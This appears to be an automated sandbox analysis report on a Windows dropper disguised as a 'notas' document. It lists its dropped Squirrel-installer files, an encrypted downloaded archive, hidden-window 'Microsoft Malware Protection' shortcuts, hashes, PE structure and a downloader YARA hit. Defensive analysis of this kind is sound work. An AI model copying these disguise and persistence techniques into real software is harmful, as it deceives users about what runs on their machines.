Encrypted:	true
SSDEEP:	24576:CWQzq+aGgkz0SrQy75OYpk7LmMHseMOWsxam8p4/HND7mxcKizFWyT9IdgPSFBC:CJ9zey75OYpk7nMeMOBGulqCJ9I+PSFQ
MD5:	7BDBDE71A61EE412CB77156199EEDC46
SHA1:	652938A112187AEE90FAD5C30C9D7575C3783552
SHA-256:	BC4D61BE88A05E537CCB5E85B6517A73B7C7A191F18AA6B815E7349129568F09
SHA-512:	DD9F580D439EEDAE81C24A78EDF5B5A831D60CF6FFFE3BD10209F889CCA2F78916682450D7B089D56C6C6D762278F0384310DB2CA4040EDD37E33D8A0C31AE68
Malicious:	false
Preview:	PK.........PWXt.f.............ContentPack.nuspecu.MN.0...H...L.!.....e..,g.X.?x&...3.@.B\..uJ....7OO..O...I.b$.]Sl......b......2(......)F.p.@zD...FGO..R{.GoJ....P..)..w..)L.i.U.X.(.......?.e.......ZYI..lx...a..j..GZ;.p..7...k..2...F.#....+....D(.?}..t4.S.u.3a..l...S.?.}.G3....K\|..QW....z<0.]XB....PK.........PWX................lib/PK.........PWX................lib/net48/PK.........PWX...../...V......lib/net48/BumpFiles.exe...@...ni.9J...8P:.[0..8J..H..D.,T...E.TQ@ZA...1(..$...}w......u.~.3;.;.;;.;......... .........t .....S.:'...]..j..a.....".z...HwB@@ ..FD.B..>.H.+;....Q...Uz....8.m*._.r..^$=...@..m..{........7-......1.2@...n..7...eg..@`..n..\|..$...8-....?........">.%.5...G.L........d.r..,+.. .......@..f..3}m....3I..z%21..~...........].@&.qi8..L...f..:%.%B.J.{.....t.H.$w...K...=.LG...... -...Gtz....h..}&...os..Y..\n.A..r. .}@ .K.4......N<....]...F_.1.B..WJ..sibh.l.d........ax.........Ua[..q...\|.P.=.......q.}.Y.>.<$.....W:U....7Cl...[......2.......~.g.A4-.

C:\Users\user\AppData\Local\ContentPack\packages\RELEASES

Download File

Process:	C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	80
Entropy (8bit):	4.821762239033052
Encrypted:	false
SSDEEP:	3:DZS5jNDmHQaWuWQxL1EVvJxrG61:DZy5YQa3WWL18vjGq
MD5:	2974BFB739B24B645F7958ABA97741C4
SHA1:	7C874B7A39F81575653A4C11897DE01A7735406A
SHA-256:	3C4CF29D3FADA3AD626D0FBCC5C6087D206876B14CDC658947F02A058106E6BA
SHA-512:	6C59BB4F2B8D33B8FB9F8E3B3EDCAA5D972565464525B34BA405630D449201D13E0AE373A67BF5275DABF34C7F6287E56F1B932BD4242B00B330E828E8AECDC6
Malicious:	false
Preview:	.652938A112187AEE90FAD5C30C9D7575C3783552 ContentPack-1.0.0-full.nupkg 1204336

C:\Users\user\AppData\Local\ContentPack\packages\SquirrelTemp\tempa

Download File

Process:	C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	80
Entropy (8bit):	4.821762239033052
Encrypted:	false
SSDEEP:	3:DZS5jNDmHQaWuWQxL1EVvJxrG61:DZy5YQa3WWL18vjGq
MD5:	2974BFB739B24B645F7958ABA97741C4
SHA1:	7C874B7A39F81575653A4C11897DE01A7735406A
SHA-256:	3C4CF29D3FADA3AD626D0FBCC5C6087D206876B14CDC658947F02A058106E6BA
SHA-512:	6C59BB4F2B8D33B8FB9F8E3B3EDCAA5D972565464525B34BA405630D449201D13E0AE373A67BF5275DABF34C7F6287E56F1B932BD4242B00B330E828E8AECDC6
Malicious:	false
Preview:	.652938A112187AEE90FAD5C30C9D7575C3783552 ContentPack-1.0.0-full.nupkg 1204336

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Update.exe.log

Download File

Process:	C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2751
Entropy (8bit):	5.372322730968244
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6ouHlJH/lEHuFKHKS+AHKKk7O6HFHKp1qHGIsCtHTHNHkbEHKxHO:iqbYqGSI6ou/fmOYqSJqKk7jlqpwmjCX
MD5:	E186D8CCFA77C108F5C38908EF87820C
SHA1:	47495A5AE5BE859D96CD2C2BD276A4B9A8B441C0
SHA-256:	E2CDF4184CFAFC04DCEB16A3AB1826DBB566B677590B5852A74411BA8B308142
SHA-512:	4173349453148C359F9E0DD698D7C8142A3198BD327722A3D5D5BD1C19F9695EFE732DB3769FB938FF3705AA3CC35A90EDFF2B2ED6F08F2901E376C6A3A1EE5E
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\WindowsBase\95a5c1baa004b986366d34856f0a5a75\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\ef4e808cb158d79ab9a2b049f8fab733\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\webTc[1].zip

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	data
Category:	dropped
Size (bytes):	8764801
Entropy (8bit):	7.999974027044619
Encrypted:	true
SSDEEP:	196608:He+u4ln80jwTABJKUiD2iS1+sGRVc3PC3s3Z6oF+nzPZp:HeZ4N80jwG3W2xR2YP6MX43
MD5:	88EC493F2A48D234120348AEAB6D3808
SHA1:	3FB458578198B4691B409FFEABB99EDFE3827EAD
SHA-256:	4086FF865F27274805EEB8DF9504D381AF17582632FFFD02C81245A3119A3F34
SHA-512:	9A8CF59D76CBDEB0B03525A1D3E2869688F597F2A10751E13815CB827D92F12A7FCFAB0A32932A55386BE3026124BE9CA51FC2DF6A112D3B2E00141BEBA6F5F9
Malicious:	false
Preview:	H~.Ea..kyJ._.....@....<.=..}.]..A.).W.....".gb...s...lR..4p..ekJ.......n...q.~.P......(J!...v.Ma>.<.+(.r.>...F..g8..k e...Rb..S....w...^.,.`...T.9`zC...?.37..._.Y&!..L.I..H.q..3{S.H........D.v1k.[.^n..-.....J....W.c.#y.G,.U....(V..e..EM...-!f...\.}..}.[.."......z...B.q..'c".o......._...T....~.....D.d......J......9w..b.Kik..H..fSQ........&.`.'.......92:....i...~...^...Q.mQ.;pt...."....r]..).mv...q3....H.I./.v..G.....e.4.z"...UsSn...D...I....S.A:.....\|.x...).b..7){.i0.L.r}V6.....3...._.8..XY~.;..~%....:uc.y".7...%.ip..p.....Li..wh...j._..R:.....4..9......`.._.`....PYC..k1....._$..(a..N..A...\..<./.....E..-...dM........i..y..G3!....0q..C.cm.R&W?.E@.........V..79.Mf........@.G......"#.....$.......g.b.8...tYQZ...d...~>.?.4.v.O........%.?l...R*.!.\....N..`..(..M....h.7TcQ..1.?`.3.\|..sX(;....y`..cd..K.....B..\|...X.8.......6q.`.....J...2P./G.<...^}....S.'.......J#.....q.k]Zg%..+.@.'[...cE7....g......2w<.J....1s]##....n..!.U..#.. ..6"

C:\Users\user\AppData\Local\SquirrelTemp\ContentPack-1.0.0-full.nupkg

Download File

Process:	C:\Users\user\Desktop\0219830219301290321012notas.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	1204336
Entropy (8bit):	7.998442627142358
Encrypted:	true
SSDEEP:	24576:CWQzq+aGgkz0SrQy75OYpk7LmMHseMOWsxam8p4/HND7mxcKizFWyT9IdgPSFBC:CJ9zey75OYpk7nMeMOBGulqCJ9I+PSFQ
MD5:	7BDBDE71A61EE412CB77156199EEDC46
SHA1:	652938A112187AEE90FAD5C30C9D7575C3783552
SHA-256:	BC4D61BE88A05E537CCB5E85B6517A73B7C7A191F18AA6B815E7349129568F09
SHA-512:	DD9F580D439EEDAE81C24A78EDF5B5A831D60CF6FFFE3BD10209F889CCA2F78916682450D7B089D56C6C6D762278F0384310DB2CA4040EDD37E33D8A0C31AE68
Malicious:	false
Preview:	PK.........PWXt.f.............ContentPack.nuspecu.MN.0...H...L.!.....e..,g.X.?x&...3.@.B\..uJ....7OO..O...I.b$.]Sl......b......2(......)F.p.@zD...FGO..R{.GoJ....P..)..w..)L.i.U.X.(.......?.e.......ZYI..lx...a..j..GZ;.p..7...k..2...F.#....+....D(.?}..t4.S.u.3a..l...S.?.}.G3....K\|..QW....z<0.]XB....PK.........PWX................lib/PK.........PWX................lib/net48/PK.........PWX...../...V......lib/net48/BumpFiles.exe...@...ni.9J...8P:.[0..8J..H..D.,T...E.TQ@ZA...1(..$...}w......u.~.3;.;.;;.;......... .........t .....S.:'...]..j..a.....".z...HwB@@ ..FD.B..>.H.+;....Q...Uz....8.m*._.r..^$=...@..m..{........7-......1.2@...n..7...eg..@`..n..\|..$...8-....?........">.%.5...G.L........d.r..,+.. .......@..f..3}m....3I..z%21..~...........].@&.qi8..L...f..:%.%B.J.{.....t.H.$w...K...=.LG...... -...Gtz....h..}&...os..Y..\n.A..r. .}@ .K.4......N<....]...F_.1.B..WJ..sibh.l.d........ax.........Ua[..q...\|.P.=.......q.}.Y.>.<$.....W:U....7Cl...[......2.......~.g.A4-.

C:\Users\user\AppData\Local\SquirrelTemp\RELEASES

Download File

Process:	C:\Users\user\Desktop\0219830219301290321012notas.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	80
Entropy (8bit):	4.821762239033052
Encrypted:	false
SSDEEP:	3:DZS5jNDmHQaWuWQxL1EVvJxrG61:DZy5YQa3WWL18vjGq
MD5:	2974BFB739B24B645F7958ABA97741C4
SHA1:	7C874B7A39F81575653A4C11897DE01A7735406A
SHA-256:	3C4CF29D3FADA3AD626D0FBCC5C6087D206876B14CDC658947F02A058106E6BA
SHA-512:	6C59BB4F2B8D33B8FB9F8E3B3EDCAA5D972565464525B34BA405630D449201D13E0AE373A67BF5275DABF34C7F6287E56F1B932BD4242B00B330E828E8AECDC6
Malicious:	false
Preview:	.652938A112187AEE90FAD5C30C9D7575C3783552 ContentPack-1.0.0-full.nupkg 1204336

C:\Users\user\AppData\Local\SquirrelTemp\Squirrel-Install.log

Download File

Process:	C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (387), with CRLF line terminators
Category:	dropped
Size (bytes):	2567
Entropy (8bit):	5.314879117590282
Encrypted:	false
SSDEEP:	48:CD/tHPF3z6MeX6t937AXbNvB8X/uqDZjauqDZI1BjZ6WaXij/I1BjZ6Wf11jndo6:0lj9bGqDZPqDZwf6i7wfD
MD5:	BF063D00FD8D2618DE5EC6F2EB15367C
SHA1:	943E579A47281FA2213599E22D75BFF01F3F068C
SHA-256:	3DDD171B6AFEAB017195E20EA6635DF341D041B5590A48A3B3306C14FC6BFD98
SHA-512:	37D77542418C24BB18A8D60B6AF9281A23E8A943A77E020C92FA8352E759FEC0C3F261805C479B8D3045220E17E240CD12972CB25A0FEE56D1144545B48F0D7B
Malicious:	false
Preview:	.[23/02/24 15:33:55] info: Program: Starting Squirrel Updater: --install . --rerunningWithoutUAC..[23/02/24 15:33:55] info: Program: Starting install, writing to C:\Users\user\AppData\Local\SquirrelTemp..[23/02/24 15:33:55] info: Program: About to install to: C:\Users\user\AppData\Local\ContentPack..[23/02/24 15:33:55] info: CheckForUpdateImpl: Reading RELEASES file from C:\Users\user\AppData\Local\SquirrelTemp..[23/02/24 15:33:56] info: CheckForUpdateImpl: First run, starting from scratch..[23/02/24 15:33:56] info: ApplyReleasesImpl: Writing files to app directory: C:\Users\user\AppData\Local\ContentPack\app-1.0.0..[23/02/24 15:33:56] info: LogHost: Rigging execution stub for BumpFiles_ExecutionStub.exe to C:\Users\user\AppData\Local\ContentPack\BumpFiles.exe..[23/02/24 15:33:56] info: ApplyReleasesImpl: Squirrel Enabled Apps: []..[23/02/24 15:33:56] warn: ApplyReleasesImpl: No apps are marked as Squirrel-aware! Going to run them all..[23/02/24 15:33:56] info: ApplyRelease

C:\Users\user\AppData\Local\SquirrelTemp\Update.exe

Download File

Process:	C:\Users\user\Desktop\0219830219301290321012notas.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1899520
Entropy (8bit):	5.894883178349122
Encrypted:	false
SSDEEP:	24576:pWltPuAnUCiag6CKM2zCy9sQuOjj1VgZej6GeS4lNrCze5qhYp4t9m2:0t3UCiag6CKM2zCyZuOjJaxSS5qh
MD5:	A560BAD9E373EA5223792D60BEDE2B13
SHA1:	82A0DA9B52741D8994F28AD9ED6CBD3E6D3538FA
SHA-256:	76359CD4B0349A83337B941332AD042C90351C2BB0A4628307740324C97984CC
SHA-512:	58A1B4E1580273E1E5021DD2309B1841767D2A4BE76AB4A7D4FF11B53FA9DE068F6DA67BF0DCCFB19B4C91351387C0E6E200A2A864EC3FA737A1CB0970C8242C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5.p_............................>.... ........@.. .......................`............@.....................................W.... .......................@....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................ .......H.......LU..............,.................................................{......{......{....r.(......}......}......}........0..S........u......,G(.....{.....{....o....,/(.....{.....{....o....,.(.....{.....{....o.......0..K....... .A. )UU.Z(.....{....o....X )UU.Z(.....{....o....X )UU.Z(.....{....o....X..0...........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(........{......{....

C:\Users\user\AppData\Local\Temp\.squirrel-lock-9ACA4B710A2695B9A2B410022D61910DE7EA5660

Download File

Process:	C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
File Type:	ISO-8859 text, with CR line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:9:9
MD5:	A7E0F8AC46398A7876D1E40DD52C2AAB
SHA1:	B66922B4E6F09E23C072E4AFF49C67C3121DD5AF
SHA-256:	05174BBF0D407087E45B12BAAE17117426852FF3A9E58D12A0EBB9A10B409743
SHA-512:	E6B93215582F7F4F5E9292273A9466B5D0CC3A4EA7D77AE42854203755441DD5EDBEFB11FE8890CAE7783E41E2EDBF61EC7B03D7E5E9870A7821D4016B095F79
Malicious:	false
Preview:	....

C:\Users\user\AppData\Roaming\Microsoft\Crypto\Keys\bin01.zip (copy)

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	data
Category:	dropped
Size (bytes):	142
Entropy (8bit):	6.55447018279355
Encrypted:	false
SSDEEP:	3:DfVjzD2ZzXgE4dXC/FiYvyfgaPDlZqLDpVYngGbu/6Ry0s9rYdn:hnDEgRdSZEg8YDp1ERy0OAn
MD5:	57A37BD0840D0745A9481BCC25B5A792
SHA1:	E8B7C744981C0713DE5EBB308897EFCBD374FD11
SHA-256:	E2B2371F95D8D9CBFCA301AFF3441466E30453BBD37A42FA17DAF4D85AA7E627
SHA-512:	08AFA751874B49FB20ADBEC0C824609DAE0DECD6E747471EF8CB19FAE299A65D21ACC02185560669ED9E36CD74E2E4372B61E52EEF34D5785E9BBA3DC8FD431B
Malicious:	false
Preview:	H~.E.L......z.'.<.Er...a..]...`rf1_B..U.~.e)?...Ri..{.. X..ykq...&..(...Ri..G..08..<.Er...X}_.....V ....j..PK.o..'a#-.=D4...d......&.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft Corporation\Microsoft Malware Protection.lnk

Download File

Process:	C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Fri Feb 23 13:33:56 2024, mtime=Fri Feb 23 13:33:56 2024, atime=Fri Feb 23 13:33:56 2024, length=196096, window=hide
Category:	dropped
Size (bytes):	2278
Entropy (8bit):	3.7957416367456025
Encrypted:	false
SSDEEP:	48:8ccORGOB2rxBtrBu9rB0rBubZlqrBuCByA7EL/B2:8LG5BUBpBeBOB7BhByAgDB
MD5:	A649A479BFA9DEC841B4D027D654323F
SHA1:	83C8CAEC55DF28807A545F4789B41244A5C59A07
SHA-256:	40E489034042E47741969DA25AF367A62165BF76C68B831CD07D1144DFD77030
SHA-512:	A91FE92711A4BE74C3745D9F9609FB88535BE3F503AC2BA8E90211CB85B40E7E75C357D4FC30B11A5A26ED26213C7CEE3470BBADDB03CC8CCB376F98389D30F2
Malicious:	false
Preview:	L..................F.@.. ...0..Tef..0..Tef..0..Tef............................:..DG..Yr?.D..U..k0.&...&.......y.Yd......Oef....'Uef......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)BWX:t..........................d...A.p.p.D.a.t.a...B.P.1.....WX<t..Local.<......EW)BWX<t.........................y...L.o.c.a.l.....`.1.....WX=t..CONTEN~1..H......WX<tWX=t..........................1%..C.o.n.t.e.n.t.P.a.c.k.....h.2.....WX=t .BUMPFI~1.EXE..L......WX=tWX=t....P!.....................t..B.u.m.p.F.i.l.e.s...e.x.e.......f...............-.......e............A.......C:\Users\user\AppData\Local\ContentPack\BumpFiles.exe....C.o.n.t.e.n.t.P.a.c.k.1.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.C.o.n.t.e.n.t.P.a.c.k.\.B.u.m.p.F.i.l.e.s...e.x.e.3.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.C.o.n.t.e.n.t.P.a.c.k.\.a.p.p.-.1...0...0.7.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.C.o.n.t.e.n.t.P.a.c.k.\.B.u.m.p.F.i.l.e.s...e.x.e.........%U

C:\Users\user\Desktop\Microsoft Malware Protection.lnk

Download File

Process:	C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Fri Feb 23 13:33:56 2024, mtime=Fri Feb 23 13:33:56 2024, atime=Fri Feb 23 13:33:56 2024, length=196096, window=hide
Category:	dropped
Size (bytes):	2264
Entropy (8bit):	3.802084026058695
Encrypted:	false
SSDEEP:	48:8rcyRGfB2rxBnrBu9rB0rBubZlqrBuCByA7EL/B2:8I6QBUBrBeBOB7BhByAgDB
MD5:	506411A6B91C64D8BB010C4229473AC0
SHA1:	557FF3C0DB22329304B305FEBBFF8BC6A18348E1
SHA-256:	A42C4971BD2EB120316BEDAA86FBDCFDC6BBA32867FA5919ED478C0FCDC1B02D
SHA-512:	4312F7C1E430DEE1E6770C17728574710CDD33284F7BA4DCEC97071B830478D750A128A51E220005058AC9EE6118EBE5294BEDBCC7442A6640F235DB52E65A05
Malicious:	false
Preview:	L..................F.@.. ...0..Tef..B$IUef..0..Tef............................:..DG..Yr?.D..U..k0.&...&.......y.Yd......Oef....'Uef......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)BWX:t..........................d...A.p.p.D.a.t.a...B.P.1.....WX<t..Local.<......EW)BWX=t.............................L.o.c.a.l.....`.1.....WX=t..CONTEN~1..H......WX<tWX=t...........................t..C.o.n.t.e.n.t.P.a.c.k.....h.2.....WX=t .BUMPFI~1.EXE..L......WX=tWX=t....P!.....................t..B.u.m.p.F.i.l.e.s...e.x.e.......f...............-.......e............A.......C:\Users\user\AppData\Local\ContentPack\BumpFiles.exe....C.o.n.t.e.n.t.P.a.c.k.*.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.C.o.n.t.e.n.t.P.a.c.k.\.B.u.m.p.F.i.l.e.s...e.x.e.3.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.C.o.n.t.e.n.t.P.a.c.k.\.a.p.p.-.1...0...0.7.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.C.o.n.t.e.n.t.P.a.c.k.\.B.u.m.p.F.i.l.e.s...e.x.e.........%USERPROFILE%\Ap

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.963237042378313
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	0219830219301290321012notas.exe
File size:	2'102'272 bytes
MD5:	a548469585481a1b7f98c9b09d271349
SHA1:	677eabeb661d965c7d3d5ff6f6b9336e27b80b91
SHA256:	21340c04b12af92f3bd3dd076e5a4f20c0fe5558461b5ff3f848e5d5b7183322
SHA512:	b40102429700b056c01953414b3a8f4c86242ee3d98478a834cb49fcaeca0e668e9d297af67c48733eeaa5bda7f6d3962b2248ce1adadf5969ffea997ecfffc1
SSDEEP:	49152:UMBQcZoX44p0k4icOpl048bBIaPeF/BXoG05ChlszkSJl:UMBQWo7pZuOplcSas/poG0Cvs3
TLSH:	D7A5232273C4C175D4B706307AF9E8B599BEBD228E319A5BA395035C4D701C0DB6AB2F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........X........................y.......................................................a...T.......T.Z.......2.....T.......Rich...

File Icon


Icon Hash:	13170f6d2d6d6d33

Static PE Info

General

Entrypoint:	0x40ab5c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x5F70D7D7 [Sun Sep 27 18:20:07 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	e6f4169f2a5c3a8f93171d9f593bd22a

Entrypoint Preview

Instruction
call 00007F46848DEE3Ch
jmp 00007F46848DE75Fh
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F46848DE93Dh
mov dword ptr [esi], 0041F45Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0041F464h
mov dword ptr [ecx], 0041F45Ch
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F46848DE90Ah
mov dword ptr [esi], 0041F478h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0041F480h
mov dword ptr [ecx], 0041F478h
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0041F43Ch
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007F46848E004Ch
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0041F43Ch
push eax
call 00007F46848E0097h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0041F43Ch
push eax
call 00007F46848E0080h
test byte ptr [ebp+08h], 00000001h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2932c	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2c000	0x1d6480	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x203000	0x190c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x27720	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1f398	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1f000	0x1a4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x28ef0	0xe0	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1d32b	0x1d400	723597f58d5674921108e642a8e1b5b4	False	0.5962540064102564	data	6.658318567238198	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x1f000	0xacae	0xae00	fa1645fd03dda975b8bd67904b34af32	False	0.44526760057471265	data	4.948544868021258	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x2a000	0x1870	0xe00	f8724007e5d2ce85c65b5408a736d005	False	0.21484375	data	3.016754020922221	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2c000	0x1d6480	0x1d6600	856b9bfbfd58402a14969c3b0c3d5a17	False	0.9935229745216583	data	7.997560884030563	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x203000	0x190c	0x1a00	fca0dc86189b5b127d85095ebd6abd95	False	0.7630709134615384	data	6.514362877721557	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
DATA	0x2c340	0x1d37b4	Zip archive data, at least v2.0 to extract, compression method=deflate	English	United States	1.0003108978271484
FLAGS	0x1ffaf4	0xc	data	English	United States	1.6666666666666667
RT_ICON	0x1ffb00	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.21774193548387097
RT_ICON	0x1ffde8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.11597472924187725
RT_ICON	0x200690	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.21774193548387097
RT_ICON	0x200978	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.11597472924187725
RT_STRING	0x201220	0x418	data	English	United States	0.3148854961832061
RT_STRING	0x201638	0x604	data	English	United States	0.21363636363636362
RT_STRING	0x201c3c	0x152	data	English	United States	0.5591715976331361
RT_GROUP_ICON	0x201d90	0x22	data	English	United States	1.0588235294117647
RT_GROUP_ICON	0x201db4	0x22	data	English	United States	1.088235294117647
RT_VERSION	0x201dd8	0x2c0	data	English	United States	0.46448863636363635
RT_MANIFEST	0x202098	0x3e7	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (939), with CRLF line terminators	English	United States	0.5145145145145145

Imports

DLL	Import
KERNEL32.dll	LoadResource, FindResourceW, lstrlenW, GetProcAddress, GetModuleHandleW, DeleteCriticalSection, GetTempPathW, GetLastError, GetTempFileNameW, MoveFileW, WaitForSingleObject, GetExitCodeProcess, CloseHandle, DeleteFileW, GetModuleFileNameW, GetCurrentProcess, LoadLibraryW, FreeLibrary, InitializeCriticalSectionEx, GetFileAttributesW, CreateFileW, SetFilePointer, ReadFile, VerSetConditionMask, GetCurrentDirectoryW, MultiByteToWideChar, LocalFileTimeToFileTime, WideCharToMultiByte, CreateDirectoryW, WriteFile, SetFileTime, FreeResource, SizeofResource, LockResource, CreateProcessW, GetSystemDirectoryW, SetDefaultDllDirectories, GetCurrentThreadId, DecodePointer, RaiseException, LeaveCriticalSection, EnterCriticalSection, lstrcmpiW, LoadLibraryExW, GetConsoleMode, GetConsoleCP, SystemTimeToFileTime, VerifyVersionInfoW, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsDebuggerPresent, OutputDebugStringW, UnhandledExceptionFilter, 